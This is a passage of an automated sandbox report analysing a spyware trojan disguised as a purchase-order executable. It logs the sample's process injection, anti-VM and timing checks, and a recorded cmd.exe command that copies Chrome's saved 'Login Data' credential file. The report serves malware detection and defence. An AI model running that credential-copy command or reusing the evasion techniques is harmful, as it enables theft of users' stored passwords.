          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0557B150 appears 72 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04A5B150 appears 87 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041A360 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041A410 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041A490 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041A35A NtCreateFile,NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041A3B2 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041A40A NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041A5BA NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055BAD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B95F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055BA770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055BA710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9FE0 NtCreateMutant,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B96D0 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B99D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055BB040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B98A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055BA3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A995D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99560 NtWriteFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A996E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A996D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99610 NtEnumerateValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99770 NtSetInformationFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A999A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A995F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A9AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A997A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A9A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A9A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A998A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A998F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A9B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A999D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A9A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A99B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DA360 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DA410 NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DA490 NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DA540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DA35A NtCreateFile,NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DA3B2 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DA40A NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DA5BA NtAllocateVirtualMemory,
          Source: PO#12108997.exeBinary or memory string: OriginalFilename vs PO#12108997.exe
          Source: PO#12108997.exe, 00000000.00000002.270009713.000000000180A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO#12108997.exe
          Source: PO#12108997.exe, 00000000.00000000.236724294.0000000000FB2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameActivityCont.exe6 vs PO#12108997.exe
          Source: PO#12108997.exe, 00000000.00000002.276802246.0000000007E80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs PO#12108997.exe
          Source: PO#12108997.exe, 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs PO#12108997.exe
          Source: PO#12108997.exeBinary or memory string: OriginalFilenameActivityCont.exe6 vs PO#12108997.exe
          Source: PO#12108997.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: PO#12108997.exeVirustotal: Detection: 34%
          Source: PO#12108997.exeReversingLabs: Detection: 61%
          Source: PO#12108997.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO#12108997.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\PO#12108997.exe "C:\Users\user\Desktop\PO#12108997.exe"
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
          Source: C:\Windows\SysWOW64\cmmon32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
          Source: C:\Users\user\Desktop\PO#12108997.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO#12108997.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\DB1Jump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@2/2
          Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogri.iniJump to behavior
          Source: C:\Users\user\Desktop\PO#12108997.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3768:120:WilError_01
          Source: C:\Windows\SysWOW64\cmmon32.exeFile written: C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogri.iniJump to behavior
          Source: PO#12108997.exe, rI/hS.csCryptographic APIs: 'CreateDecryptor'
          Source: PO#12108997.exe, rI/hS.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.0.PO#12108997.exe.fb0000.0.unpack, rI/hS.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.0.PO#12108997.exe.fb0000.0.unpack, rI/hS.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.2.PO#12108997.exe.fb0000.0.unpack, rI/hS.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.2.PO#12108997.exe.fb0000.0.unpack, rI/hS.csCryptographic APIs: 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\PO#12108997.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: PO#12108997.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PO#12108997.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: PO#12108997.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: ActivityCont.pdb source: PO#12108997.exe
          Source: Binary string: cmmon32.pdb source: vbc.exe, 00000004.00000002.349181179.0000000005540000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: ActivityCont.pdbh source: PO#12108997.exe
          Source: Binary string: cmmon32.pdbGCTL source: vbc.exe, 00000004.00000002.349181179.0000000005540000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000004.00000002.349226595.0000000005550000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.349502353.000000000566F000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.268678658.000000000521F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.270731207.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503794062.0000000004B4F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503522121.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.348874642.0000000004700000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.350723138.0000000004899000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000002.349226595.0000000005550000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.349502353.000000000566F000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.268678658.000000000521F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.270731207.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000011.00000002.503794062.0000000004B4F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503522121.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.348874642.0000000004700000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.350723138.0000000004899000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: vbc.pdb source: cmmon32.exe, 00000011.00000002.502692331.0000000004705000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: PO#12108997.exe, rI/hS.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 0.0.PO#12108997.exe.fb0000.0.unpack, rI/hS.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 0.2.PO#12108997.exe.fb0000.0.unpack, rI/hS.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: C:\Users\user\Desktop\PO#12108997.exeCode function: 0_2_092D3E12 push ecx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00417095 push cs; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00416B77 push ss; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041D4C5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00417CD7 pushfd ; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041D57C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041D512 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041D51B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AAD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007D7095 push cs; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DD9BC push ds; retf
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007D7CD7 pushfd ; retf
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DD4C5 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DD57C push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DD51B push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DD512 push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.74619611944

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xE5
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PO#12108997.exe PID: 6956, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000007C9904 second address: 00000000007C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000007C9B7E second address: 00000000007C9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO#12108997.exe TID: 6960Thread sleep time: -45733s >= -30000s
          Source: C:\Users\user\Desktop\PO#12108997.exe TID: 6984Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 612Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\PO#12108997.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI coverage: 7.6 %
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI coverage: 8.6 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeThread delayed: delay time: 45733
          Source: C:\Users\user\Desktop\PO#12108997.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000005.00000000.283141198.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
